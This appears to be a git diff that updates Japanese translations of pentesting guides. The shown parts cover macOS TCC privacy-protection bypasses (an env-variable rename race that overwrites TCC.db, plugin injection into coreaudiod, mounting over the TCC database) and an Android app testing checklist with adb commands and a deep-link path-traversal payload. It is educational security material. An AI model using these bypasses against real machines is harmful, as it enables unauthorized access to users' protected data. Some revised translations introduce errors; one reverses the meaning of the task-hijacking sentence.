+**`SQLITE_SQLLOG_DIR="path/folder"`**は基本的に**開いているすべてのdbがそのパスにコピーされる**ことを意味します。このCVEでは、この制御が悪用され、**SQLiteデータベース**内に**書き込まれ**、FDAのTCCデータベースで**開かれるプロセス**によって**`SQLITE_SQLLOG_DIR`**が**ファイル名のシンボリックリンク**で悪用され、そのデータベースが**開かれると**、ユーザーの**TCC.dbが上書き**されます。\
+**詳細情報** [**の書き込み**](https://gergelykalman.com/sqlol-CVE-2023-32422-a-macos-tcc-bypass.html) **および** [**トーク**](https://www.youtube.com/watch?v=f1HA5QhLQ7Y&t=20548s)。
 
 ### **SQLITE_AUTO_TRACE**
 
-環境変数**`SQLITE_AUTO_TRACE`**が設定されている場合、ライブラリ**`libsqlite3.dylib`**はすべてのSQLクエリを**ログ**記録し始めます。多くのアプリケーションがこのライブラリを使用していたため、すべてのSQLiteクエリをログに記録することが可能でした。
+環境変数**`SQLITE_AUTO_TRACE`**が設定されている場合、ライブラリ**`libsqlite3.dylib`**はすべてのSQLクエリの**ログを開始**します。多くのアプリケーションがこのライブラリを使用していたため、すべてのSQLiteクエリをログに記録することが可能でした。
 
 いくつかのAppleアプリケーションは、このライブラリを使用してTCC保護情報にアクセスしていました。
 ```bash
@@ -182,34 +182,34 @@ launchctl setenv SQLITE_AUTO_TRACE 1
 
 この**env変数は`Metal`フレームワークによって使用され**、これはさまざまなプログラムの依存関係であり、特に`Music`がFDAを持っています。
 
-次のように設定します: `MTL_DUMP_PIPELINES_TO_JSON_FILE="path/name"`。`path`が有効なディレクトリであれば、バグがトリガーされ、`fs_usage`を使用してプログラム内で何が起こっているかを確認できます:
+次のように設定します: `MTL_DUMP_PIPELINES_TO_JSON_FILE="path/name"`。`path`が有効なディレクトリであれば、バグがトリガーされ、`fs_usage`を使用してプログラム内で何が起こっているかを見ることができます:
 
-- `path/.dat.nosyncXXXX.XXXXXX`(Xはランダム)という名前のファイルが`open()`されます
-- 1つ以上の`write()`がファイルに内容を書き込みます(これを制御することはできません)
-- `path/.dat.nosyncXXXX.XXXXXX`が`path/name`に`renamed()`されます
+- `path/.dat.nosyncXXXX.XXXXXX`(Xはランダム)という名前のファイルが`open()`されます。
+- 1つ以上の`write()`がファイルに内容を書き込みます(これを制御することはできません)。
+- `path/.dat.nosyncXXXX.XXXXXX`が`path/name`に`renamed()`されます。
 
-これは一時ファイルの書き込みであり、その後に**`rename(old, new)`** **が行われますが、これは安全ではありません。**
+これは一時ファイルの書き込みであり、その後に**`rename(old, new)`**が行われますが、**これは安全ではありません。**
 
 安全でない理由は、**古いパスと新しいパスを別々に解決する必要があるため**、これには時間がかかる可能性があり、レースコンディションに対して脆弱です。詳細については、`xnu`関数`renameat_internal()`を確認できます。
 
 > [!CAUTION]
-> 基本的に、特権プロセスがあなたが制御するフォルダから名前を変更している場合、RCEを獲得し、特権アプリが作成したファイルにアクセスさせたり、このCVEのようにファイルディスクリプタを保存することができます。
+> 基本的に、特権プロセスがあなたが制御するフォルダから名前を変更している場合、RCEを獲得し、異なるファイルにアクセスさせることができるか、またはこのCVEのように、特権アプリが作成したファイルを開いてFDを保存することができます。
 >
-> 名前の変更があなたが制御するフォルダにアクセスする場合、ソースファイルを変更したり、そのファイルにFDを持っている間に、目的のファイル(またはフォルダ)をシンボリックリンクを指すように変更することで、いつでも書き込むことができます。
+> 名前変更があなたが制御するフォルダにアクセスする場合、ソースファイルを変更したり、FDを持っている間に、目的のファイル(またはフォルダ)をシンボリックリンクを指すように変更することで、いつでも書き込むことができます。
 
 これがCVEでの攻撃でした:たとえば、ユーザーの`TCC.db`を上書きするために、次のようにします:
 
-- `/Users/hacker/ourlink`を作成して`/Users/hacker/Library/Application Support/com.apple.TCC/`を指すようにします
-- ディレクトリ`/Users/hacker/tmp/`を作成します
-- `MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db`を設定します
-- このenv変数で`Music`を実行してバグをトリガーします
-- `/Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX`(Xはランダム)の`open()`をキャッチします
-- ここで、このファイルをライティング用に`open()`し、ファイルディスクリプタを保持します
-- `/Users/hacker/tmp`を`/Users/hacker/ourlink`と**ループ内で原子的に切り替えます**
-- レースウィンドウが非常に狭いため、成功の可能性を最大化するためにこれを行いますが、レースに負けることのデメリットはほとんどありません
-- 少し待ちます
-- 運が良かったかテストします
-- そうでなければ、最初から再実行します
+- `/Users/hacker/ourlink`を作成して`/Users/hacker/Library/Application Support/com.apple.TCC/`を指すようにします。
+- ディレクトリ`/Users/hacker/tmp/`を作成します。
+- `MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db`を設定します。
+- このenv変数で`Music`を実行してバグをトリガーします。
+- `/Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX`の`open()`をキャッチします(Xはランダム)。
+- ここで、このファイルをライティング用に`open()`し、ファイルディスクリプタを保持します。
+- `/Users/hacker/tmp`を`/Users/hacker/ourlink`と**ループ内で原子的に切り替えます**。
+- レースウィンドウが非常に狭いため、成功の可能性を最大化するためにこれを行いますが、レースに負けることのデメリットはほとんどありません。
+- 少し待ちます。
+- 運が良かったかテストします。
+- そうでなければ、最初から再実行します。
 
 詳細は[https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html](https://gergelykalman.com/lateralus-CVE-2023-32407-a-macos-tcc-bypass.html)を確認してください。
 
@@ -236,15 +236,15 @@ TCCは、ユーザーのHOMEフォルダ内のデータベースを使用して
 
 **最初のPOC**は[**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/)と[**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/)を使用して、ユーザーの**HOME**フォルダを変更します。
 
-1. 対象アプリの_csreq_ブロブを取得します。
-2. 必要なアクセスと_csreq_ブロブを持つ偽の_TCC.db_ファイルを植え付けます。
+1. ターゲットアプリの_csreq_ブロブを取得します。
+2. 必要なアクセス権と_csreq_ブロブを持つ偽の_TCC.db_ファイルを植え付けます。
 3. [**dsexport**](https://www.unix.com/man-page/osx/1/dsexport/)を使用してユーザーのディレクトリサービスエントリをエクスポートします。
 4. ユーザーのホームディレクトリを変更するためにディレクトリサービスエントリを修正します。
 5. [**dsimport**](https://www.unix.com/man-page/osx/1/dsimport/)を使用して修正されたディレクトリサービスエントリをインポートします。
 6. ユーザーの_tccd_を停止し、プロセスを再起動します。
 
 2番目のPOCは、`/usr/libexec/configd`を使用し、`com.apple.private.tcc.allow`に`kTCCServiceSystemPolicySysAdminFiles`の値がありました。\
-**`-t`**オプションで**`configd`**を実行することが可能で、攻撃者は**カスタムバンドルをロードする**ことができました。したがって、エクスプロイトは**ユーザーのホームディレクトリを変更するための**`dsexport`**および**`dsimport`**メソッドを**`configd`コードインジェクション**で置き換えます。
+**`-t`**オプションで**`configd`**を実行することが可能で、攻撃者は**カスタムバンドルをロードする**ことができました。したがって、エクスプロイトは、ユーザーのホームディレクトリを変更するための**`dsexport`**および**`dsimport`**メソッドを**`configd`コードインジェクション**に置き換えます。
 
 詳細については、[**元の報告**](https://www.microsoft.com/en-us/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/)を確認してください。
 
@@ -256,8 +256,8 @@ TCCは、ユーザーのHOMEフォルダ内のデータベースを使用して
 ../../../macos-proces-abuse/
 {{#endref}}
 
-さらに、TCCをバイパスするために見つかった最も一般的なプロセスインジェクションは**プラグイン(ライブラリをロード)**です。\
-プラグインは通常、ライブラリやplistの形で追加のコードであり、**メインアプリケーションによってロードされ**、そのコンテキストで実行されます。したがって、メインアプリケーションがTCC制限ファイルへのアクセスを持っている場合(付与された権限や権利によって)、**カスタムコードもそれを持つことになります**。
+さらに、TCCをバイパスするために見つかった最も一般的なプロセスインジェクションは**プラグイン(ライブラリのロード)**です。\
+プラグインは通常、ライブラリやplistの形で追加のコードであり、**メインアプリケーションによってロードされ**、そのコンテキストで実行されます。したがって、メインアプリケーションがTCC制限ファイルへのアクセス権を持っている場合(付与された権限または権利によって)、**カスタムコードもそれを持つことになります**。
 
 ### CVE-2020-27937 - Directory Utility
 
@@ -269,7 +269,7 @@ TCCは、ユーザーのHOMEフォルダ内のデータベースを使用して
 
 ### CVE-2020-29621 - Coreaudiod
 
-バイナリ**`/usr/sbin/coreaudiod`**は、権限`com.apple.security.cs.disable-library-validation`と`com.apple.private.tcc.manager`を持っていました。最初のものは**コードインジェクションを許可**し、2番目は**TCCを管理する**アクセスを与えました。
+バイナリ**`/usr/sbin/coreaudiod`**は、権限`com.apple.security.cs.disable-library-validation`と`com.apple.private.tcc.manager`を持っていました。最初のものは**コードインジェクションを許可**し、2番目は**TCCを管理する**アクセスを与えます。
 
 このバイナリは、フォルダ`/Library/Audio/Plug-Ins/HAL`から**サードパーティプラグインをロード**することを許可しました。したがって、次のPoCを使用して**プラグインをロードし、TCC権限を悪用する**ことが可能でした:
 ```objectivec
@@ -304,7 +304,7 @@ For more info check the [**original report**](https://wojciechregula.blog/post/p
 
 Core Media I/O を介してカメラストリームを開くシステムアプリケーション(**`kTCCServiceCamera`** を持つアプリ)は、`/Library/CoreMediaIO/Plug-Ins/DAL` にある **これらのプラグインをプロセス内で読み込みます**(SIP 制限なし)。
 
-そこに一般的な **コンストラクタ** を持つライブラリを保存するだけで **コードを注入** することができます。
+ここに一般的な **コンストラクタ** を持つライブラリを保存するだけで **コードを注入** することができます。
 
 いくつかの Apple アプリケーションがこれに対して脆弱でした。
 
@@ -336,7 +336,7 @@ Executable=/Applications/Firefox.app/Contents/MacOS/firefox
 
 
 ```
-フォーマットの詳細については、[**元のレポートを確認してください**](https://wojciechregula.blog/post/how-to-rob-a-firefox/)。
+フォーマルな情報については、[**元のレポートを確認してください**](https://wojciechregula.blog/post/how-to-rob-a-firefox/)。
 
 ### CVE-2020-10006
 
@@ -438,11 +438,11 @@ mkdir /tmp/snap
 # Access it
 ls /tmp/snap/Users/admin_user # This will work
 ```
-より詳細な説明は[**元のレポートで見つけることができます**](https://theevilbit.github.io/posts/cve_2020_9771/)**。**
+A more detailed explanation can be [**found in the original report**](https://theevilbit.github.io/posts/cve_2020_9771/)**.**
 
-### CVE-2021-1784 & CVE-2021-30808 - TCCファイルの上にマウント
+### CVE-2021-1784 & CVE-2021-30808 - TCCファイルのマウント
 
-TCC DBファイルが保護されていても、新しいTCC.dbファイルを**ディレクトリの上にマウントする**ことが可能でした:
+TCC DBファイルが保護されていても、新しいTCC.dbファイルを**ディレクトリにマウントする**ことが可能でした:
 ```bash
 # CVE-2021-1784
 ## Mount over Library/Application\ Support/com.apple.TCC
@@ -469,9 +469,9 @@ Check the **full exploit** in the [**original writeup**](https://theevilbit.gith
 
 [**元の解説**](https://www.kandji.io/blog/macos-audit-story-part2)で説明されているように、このCVEは`diskarbitrationd`を悪用しました。
 
-公開された`DiskArbitration`フレームワークの関数`DADiskMountWithArgumentsCommon`がセキュリティチェックを実行しました。しかし、`diskarbitrationd`を直接呼び出すことでバイパスすることが可能であり、そのためにパス内で`../`要素やシンボリックリンクを使用できます。
+公開された`DiskArbitration`フレームワークの関数`DADiskMountWithArgumentsCommon`がセキュリティチェックを実行しました。しかし、`diskarbitrationd`を直接呼び出すことでバイパスすることが可能であり、そのためにパス内で`../`要素やシンボリックリンクを使用することができます。
 
-これにより、攻撃者は`diskarbitrationd`の権限`com.apple.private.security.storage-exempt.heritable`を利用して、任意の場所にマウントを行うことができました。TCCデータベース上でも同様です。
+これにより、攻撃者は`diskarbitrationd`の権限`com.apple.private.security.storage-exempt.heritable`を利用して、TCCデータベース上を含む任意の場所にマウントを行うことができました。
 
 ### asr
 
@@ -479,11 +479,12 @@ Check the **full exploit** in the [**original writeup**](https://theevilbit.gith
 
 ### Location Services
 
-**`/var/db/locationd/clients.plist`**には、**位置情報サービスにアクセスを許可されたクライアント**を示す第三のTCCデータベースがあります。\
-フォルダ**`/var/db/locationd/`はDMGマウントから保護されていなかった**ため、自分のplistをマウントすることが可能でした。
+**`/var/db/locationd/clients.plist`**には、**位置情報サービスにアクセスすることを許可されたクライアント**を示す第三のTCCデータベースがあります。\
+フォルダ**`/var/db/locationd/`はDMGマウントから保護されていなかった**ため、自分自身のplistをマウントすることが可能でした。
 
 ## By startup apps
 
+
 {{#ref}}
 ../../../../macos-auto-start-locations.md
 {{#endref}}
diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md
index bae9f72f3..5d2808c07 100644
--- a/src/mobile-pentesting/android-app-pentesting/README.md
+++ b/src/mobile-pentesting/android-app-pentesting/README.md
@@ -24,12 +24,12 @@ android-applications-basics.md
 
 ## Other interesting tricks
 
-- [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
-- [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
-- [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
-- [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md)
-- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
-- Extract APK from device:
+- [Play Storeでの位置情報の偽装](spoofing-your-location-in-play-store.md)
+- [Shizuku Privileged API(ADBベースの非ルート特権アクセス)](shizuku-privileged-api.md)
+- [安全でないアプリ内更新メカニズムの悪用](insecure-in-app-update-rce.md)
+- [アクセシビリティサービスの悪用(Android RAT)](accessibility-services-abuse.md)
+- **APKのダウンロード**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
+- デバイスからAPKを抽出する:
 ```bash
 adb shell pm list packages
 com.android.insecurebankv2
@@ -50,10 +50,12 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
 ```
 ## ケーススタディと脆弱性
 
+
 {{#ref}}
 ../ios-pentesting/air-keyboard-remote-input-injection.md
 {{#endref}}
 
+
 {{#ref}}
 ../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 {{#endref}}
@@ -65,11 +67,11 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
 
 ### 興味深い情報の探索
 
-APKの**文字列**を確認するだけで、**パスワード**、**URL** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep))、**API**キー、**暗号化**、**Bluetooth UUID**、**トークン**など、興味深いものを探すことができます... コード実行の**バックドア**や認証バックドア(アプリにハードコーディングされた管理者資格情報)も探してください。
+APKの**文字列**を確認するだけで、**パスワード**、**URL** ([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep))、**API**キー、**暗号化**、**Bluetooth UUID**、**トークン**などの興味深い情報を検索できます... コード実行の**バックドア**や認証バックドア(アプリにハードコーディングされた管理者資格情報)も探してください。
 
 **Firebase**
 
-**FirebaseのURL**に特に注意を払い、設定が不適切でないか確認してください。[Firebaseとは何か、どのように悪用するかについての詳細情報はこちら。](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
+**FirebaseのURL**に特に注意を払い、設定が不適切でないか確認してください。[Firebaseについての詳細情報とその悪用方法については、こちらをご覧ください。](../../network-services-pentesting/pentesting-web/buckets/firebase-database.md)
 
 ### アプリケーションの基本理解 - Manifest.xml, strings.xml
 
@@ -79,7 +81,7 @@ APKの**文字列**を確認するだけで、**パスワード**、**URL** ([ht
 
 - **デバッグ可能なアプリケーション**: _Manifest.xml_ファイルでデバッグ可能として設定されたアプリケーション(`debuggable="true"`)は、接続を許可するため、悪用のリスクがあります。デバッグ可能なアプリケーションを見つけて悪用する方法については、チュートリアルを参照してください。
 - **バックアップ設定**: 機密情報を扱うアプリケーションには、`android:allowBackup="false"`属性を明示的に設定する必要があります。これにより、特にUSBデバッグが有効な場合に、adbを介した不正なデータバックアップを防ぐことができます。
-- **ネットワークセキュリティ**: _res/xml/_内のカスタムネットワークセキュリティ設定(`android:networkSecurityConfig="@xml/network_security_config"`)は、証明書ピンやHTTPトラフィック設定などのセキュリティ詳細を指定できます。特定のドメインに対してHTTPトラフィックを許可する例があります。
+- **ネットワークセキュリティ**: _res/xml/_内のカスタムネットワークセキュリティ構成(`android:networkSecurityConfig="@xml/network_security_config"`)は、証明書ピンやHTTPトラフィック設定などのセキュリティ詳細を指定できます。特定のドメインに対してHTTPトラフィックを許可することが一例です。
 - **エクスポートされたアクティビティとサービス**: マニフェスト内のエクスポートされたアクティビティとサービスを特定することで、悪用される可能性のあるコンポーネントを明らかにできます。動的テスト中のさらなる分析により、これらのコンポーネントを悪用する方法が明らかになります。
 - **コンテンツプロバイダーとファイルプロバイダー**: 公開されたコンテンツプロバイダーは、不正なアクセスやデータの変更を許可する可能性があります。ファイルプロバイダーの設定も注意深く確認する必要があります。
 - **ブロードキャストレシーバーとURLスキーム**: これらのコンポーネントは悪用される可能性があり、特に入力脆弱性に対するURLスキームの管理方法に注意を払う必要があります。
@@ -100,7 +102,7 @@ tapjacking.md
 
 ### タスクハイジャック
 
-**`launchMode`**が**`singleTask`**に設定され、**`taskAffinity`**が定義されていない**アクティビティ**は、タスクハイジャックに対して脆弱です。これは、**アプリケーション**がインストールされ、実際のアプリケーションの前に起動されると、**実際のアプリケーションのタスクをハイジャックする**可能性があることを意味します(つまり、ユーザーは**実際のアプリケーションを使用していると思いながら、悪意のあるアプリケーションと対話している**)。
+**`launchMode`**が**`singleTask`**に設定され、`taskAffinity`が定義されていない**アクティビティ**は、タスクハイジャックに対して脆弱です。これは、**アプリケーション**がインストールされ、実際のアプリケーションの前に起動されると、**実際のアプリケーションのタスクをハイジャックする**可能性があることを意味します(つまり、ユーザーは**悪意のあるアプリケーションを使用していると思い込んでいる**)。
 
 詳細情報は以下を参照してください:
 
@@ -112,10 +114,10 @@ android-task-hijacking.md
 
 **内部ストレージ**
 
-Androidでは、**内部**ストレージに**保存された**ファイルは、**作成した**アプリケーションのみが**アクセスできる**ように**設計されています**。このセキュリティ対策はAndroidオペレーティングシステムによって**強制され**、ほとんどのアプリケーションのセキュリティニーズには一般的に十分です。しかし、開発者は時折、`MODE_WORLD_READABLE`や`MODE_WORLD_WRITABLE`のようなモードを利用して、ファイルを異なるアプリケーション間で**共有**できるようにします。しかし、これらのモードは、他のアプリケーション(潜在的に悪意のあるものを含む)によるこれらのファイルへのアクセスを**制限しません**。
+Androidでは、**内部**ストレージに**保存された**ファイルは、**作成した**アプリのみが**アクセスできる**ように**設計されています**。このセキュリティ対策はAndroidオペレーティングシステムによって**強制され**、ほとんどのアプリケーションのセキュリティニーズには一般的に十分です。しかし、開発者は時折、`MODE_WORLD_READABLE`や`MODE_WORLD_WRITABLE`のようなモードを利用して、ファイルを異なるアプリケーション間で**共有**できるようにします。しかし、これらのモードは、他のアプリケーション(潜在的に悪意のあるものを含む)によるこれらのファイルへのアクセスを**制限しません**。
 
 1. **静的分析:**
-- `MODE_WORLD_READABLE`および`MODE_WORLD_WRITABLE`の使用が**注意深く検討されるべきです**。これらのモードは、**意図しないまたは不正なアクセス**にファイルを**さらす可能性があります**。
+- `MODE_WORLD_READABLE`および`MODE_WORLD_WRITABLE`の使用が**注意深く検討されるべきです**。これらのモードは、**意図しないまたは不正なアクセス**をファイルに**さらす可能性があります**。
 2. **動的分析:**
 - アプリによって作成されたファイルに設定された**権限**を**確認**します。特に、ファイルが**全世界に対して読み取りまたは書き込み可能に設定されているか**を**チェック**します。これは重大なセキュリティリスクを引き起こす可能性があり、デバイスにインストールされた**任意のアプリケーション**が、出所や意図に関係なく、これらのファイルを**読み取ったり変更したり**できるようになります。
 
@@ -147,7 +149,7 @@ Androidでは、**内部**ストレージに**保存された**ファイルは
 
 **すべての証明書を受け入れる**
 
-何らかの理由で、開発者は時々、ホスト名が以下のようなコード行と一致しない場合でも、すべての証明書を受け入れます:
+何らかの理由で、開発者は時々、ホスト名が一致しない場合でもすべての証明書を受け入れます。例えば、以下のようなコード行がある場合です:
 ```java
 SSLSocketFactory sf = new cc(trustStore);
 sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
@@ -158,15 +160,15 @@ A good way to test this is to try to capture the traffic using some proxy like B
 
 **Poor Key Management Processes**
 
-一部の開発者は、ローカルストレージに機密データを保存し、コード内にハードコーディングされた/予測可能なキーで暗号化します。これは行うべきではなく、リバースエンジニアリングにより攻撃者が機密情報を抽出できる可能性があります。
+一部の開発者は、ローカルストレージに機密データを保存し、コード内にハードコーディングされた/予測可能なキーで暗号化します。これは、リバースエンジニアリングにより攻撃者が機密情報を抽出できる可能性があるため、行うべきではありません。
 
 **Use of Insecure and/or Deprecated Algorithms**
 
-開発者は、**非推奨のアルゴリズム**を使用して認証**チェック**を行ったり、**データを保存**または**送信**したりすべきではありません。これらのアルゴリズムには、RC4、MD4、MD5、SHA1などがあります。例えば、**ハッシュ**を使用してパスワードを保存する場合、ソルトを使用したハッシュのブルートフォース**耐性**が必要です。
+開発者は、認証チェック、データの保存または送信を行うために**非推奨のアルゴリズム**を使用すべきではありません。これらのアルゴリズムには、RC4、MD4、MD5、SHA1などがあります。例えば、パスワードを保存するために**ハッシュ**を使用する場合、ソルトを使用したハッシュのブルートフォース**耐性**が必要です。
 
 ### Other checks
 
-- **APKを難読化**して、攻撃者のリバースエンジニアリング作業を困難にすることを推奨します。
+- APKを**難読化する**ことを推奨します。これにより、攻撃者のリバースエンジニアリング作業が困難になります。
 - アプリが機密性が高い場合(銀行アプリなど)、**モバイルがルート化されているかどうかを確認する独自のチェックを実行**し、適切に対処する必要があります。
 - アプリが機密性が高い場合(銀行アプリなど)、**エミュレーター**が使用されているかどうかを確認する必要があります。
 - アプリが機密性が高い場合(銀行アプリなど)、**実行前に自身の整合性を確認**し、変更されていないかを確認する必要があります。
@@ -279,10 +281,10 @@ You need to activate the **debugging** options and it will be cool if you can **
 
 **Logging**
 
-開発者は、**デバッグ情報**を公開することに注意すべきであり、これは機密データの漏洩につながる可能性があります。アプリケーションログを監視して機密情報を特定し保護するために、[**pidcat**](https://github.com/JakeWharton/pidcat)と`adb logcat`を推奨します。**Pidcat**は使いやすさと可読性のために好まれます。
+開発者は、**デバッグ情報**を公開することに注意すべきです。これは機密データの漏洩につながる可能性があります。アプリケーションのログを監視して機密情報を特定し保護するために、[**pidcat**](https://github.com/JakeWharton/pidcat)と`adb logcat`を推奨します。**Pidcat**は使いやすさと可読性のために好まれます。
 
 > [!WARNING]
-> **Android 4.0以降**、**アプリケーションは自分自身のログにのみアクセスできる**ことに注意してください。したがって、アプリケーションは他のアプリのログにアクセスできません。\
+> **Android 4.0以降**、**アプリケーションは自分のログにのみアクセスできる**ことに注意してください。したがって、アプリケーションは他のアプリのログにアクセスできません。\
 > それでも、**機密情報をログに記録しない**ことを推奨します。
 
 **Copy/Paste Buffer Caching**
@@ -297,16 +299,16 @@ Androidの**クリップボードベース**のフレームワークは、アプ
 
 **Analytics Data Sent To 3rd Parties**
 
-アプリケーションは、Google Adsenseなどのサービスを統合することが多く、開発者による不適切な実装により機密データが**漏洩する**可能性があります。潜在的なデータ漏洩を特定するために、**アプリケーションのトラフィックを傍受**し、第三者サービスに送信される機密情報がないかを確認することをお勧めします。
+アプリケーションは、Google Adsenseなどのサービスを統合することが多く、開発者による不適切な実装により機密データが**漏洩する**可能性があります。潜在的なデータ漏洩を特定するために、**アプリケーションのトラフィックを傍受し**、第三者サービスに送信される機密情報がないかを確認することをお勧めします。
 
 ### SQLite DBs
 
-ほとんどのアプリケーションは、情報を保存するために**内部SQLiteデータベース**を使用します。ペンテスト中は、作成された**データベース**、**テーブル**と**カラム**の名前、保存されたすべての**データ**を確認してください。機密情報を見つけることができるかもしれません(これは脆弱性となります)。\
+ほとんどのアプリケーションは、情報を保存するために**内部SQLiteデータベース**を使用します。ペンテスト中に作成された**データベース**、**テーブル**と**カラム**の名前、保存されたすべての**データ**を確認してください。機密情報を見つけることができるかもしれません(これは脆弱性となります)。\
 データベースは`/data/data/the.package.name/databases`に位置し、例えば`/data/data/com.mwr.example.sieve/databases`のようになります。
 
 データベースが機密情報を保存しており、**暗号化されている**が、アプリケーション内に**パスワード**が見つかる場合、それでも**脆弱性**です。
 
-`.tables`を使用してテーブルを列挙し、`.schema `を使用してテーブルのカラムを列挙します。
+`.tables`を使用してテーブルを列挙し、`.schema `を実行してテーブルのカラムを列挙します。
 
 ### Drozer (Exploit Activities, Content Providers and Services)
 
@@ -331,45 +333,45 @@ You can also start an exported activity from adb:
 ```bash
 adb shell am start -n com.example.demo/com.example.test.MainActivity
 ```
-**注意**: MobSFは、アクティビティの`android:launchMode`として_**singleTask/singleInstance**_の使用を悪意のあるものとして検出しますが、[これ](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750)によると、これは古いバージョン(APIバージョン< 21)でのみ危険なようです。
+**注意**: MobSFは、アクティビティの`android:launchMode`として_**singleTask/singleInstance**_の使用を悪意のあるものとして検出しますが、[これ](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750)によると、これは古いバージョン(APIバージョン<21)でのみ危険なようです。
 
 > [!TIP]
 > 認証バイパスは常に脆弱性ではないことに注意してください。バイパスの動作とどの情報が公開されているかによります。
 
 **機密情報の漏洩**
 
-**アクティビティは結果を返すこともできます**。もし、**`setResult`**メソッドを呼び出し、**機密情報を返す**エクスポートされた保護されていないアクティビティを見つけることができれば、機密情報の漏洩があります。
+**アクティビティは結果を返すこともできます**。もし、エクスポートされていて保護されていないアクティビティが**`setResult`**メソッドを呼び出し、**機密情報を返している**のを見つけた場合、機密情報の漏洩があります。
 
 #### タップジャッキング
 
-タップジャッキングが防止されていない場合、エクスポートされたアクティビティを悪用して**ユーザーに予期しないアクションを実行させる**ことができます。タップジャッキングについての詳細は、[**こちらのリンクを参照してください**](#tapjacking)。
+タップジャッキングが防止されていない場合、エクスポートされたアクティビティを悪用して**ユーザーに予期しないアクションを実行させる**ことができます。タップジャッキングについての詳細は[**こちらのリンクを参照してください**](#tapjacking)。
 
 ### コンテンツプロバイダーの悪用 - 機密情報へのアクセスと操作
 
-[**コンテンツプロバイダーとは何かを再確認したい場合は、こちらをお読みください。**](android-applications-basics.md#content-provider)\
+[**コンテンツプロバイダーについて復習したい場合はこれをお読みください。**](android-applications-basics.md#content-provider)\
 コンテンツプロバイダーは基本的に**データを共有する**ために使用されます。アプリに利用可能なコンテンツプロバイダーがある場合、そこから**機密データを抽出**できるかもしれません。また、**SQLインジェクション**や**パストラバーサル**の可能性をテストすることも興味深いです。これらは脆弱である可能性があります。
 
 [**Drozerを使用してコンテンツプロバイダーを悪用する方法を学びましょう。**](drozer-tutorial/index.html#content-providers)
 
 ### **サービスの悪用**
 
-[**サービスとは何かを再確認したい場合は、こちらをお読みください。**](android-applications-basics.md#services)\
-サービスのアクションは`onStartCommand`メソッドで開始されることを覚えておいてください。
+[**サービスについて復習したい場合はこれをお読みください。**](android-applications-basics.md#services)\
+サービスのアクションは`onStartCommand`メソッドで始まることを覚えておいてください。
 
 サービスは基本的に**データを受信**し、**処理**し、**応答**(またはしない)を返すものです。したがって、アプリケーションがいくつかのサービスをエクスポートしている場合は、**コードを確認**して何をしているのかを理解し、**動的にテスト**して機密情報を抽出したり、認証手段をバイパスしたりする必要があります。\
 [**Drozerを使用してサービスを悪用する方法を学びましょう。**](drozer-tutorial/index.html#services)
 
 ### **ブロードキャストレシーバーの悪用**
 
-[**ブロードキャストレシーバーとは何かを再確認したい場合は、こちらをお読みください。**](android-applications-basics.md#broadcast-receivers)\
-ブロードキャストレシーバーのアクションは`onReceive`メソッドで開始されることを覚えておいてください。
+[**ブロードキャストレシーバーについて復習したい場合はこれをお読みください。**](android-applications-basics.md#broadcast-receivers)\
+ブロードキャストレシーバーのアクションは`onReceive`メソッドで始まることを覚えておいてください。
 
-ブロードキャストレシーバーは、特定のメッセージを待機しています。レシーバーがメッセージをどのように処理するかによって、脆弱である可能性があります。\
+ブロードキャストレシーバーは特定のメッセージを待機しています。レシーバーがメッセージをどのように処理するかによって、脆弱である可能性があります。\
 [**Drozerを使用してブロードキャストレシーバーを悪用する方法を学びましょう。**](#exploiting-broadcast-receivers)
 
 ### **スキーム / ディープリンクの悪用**
 
-MobSFや[このスクリプト](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py)のようなツールを使用して、手動でディープリンクを探すことができます。\
+手動でディープリンクを探すことができ、MobSFのようなツールや[このスクリプト](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py)を使用できます。\
 **adb**や**ブラウザ**を使用して宣言された**スキーム**を**開く**ことができます:
 ```bash
 adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
@@ -393,8 +395,8 @@ _パッケージ名を**省略する**ことができ、モバイルは自動的
 
 **パス内のパラメータ**
 
-**URLのパス内にパラメータを使用しているディープリンクがあるかどうかも確認する必要があります**。例えば、`https://api.example.com/v1/users/{username}` のように。この場合、`example://app/users?username=../../unwanted-endpoint%3fparam=value` のようにパスのトラバーサルを強制することができます。\
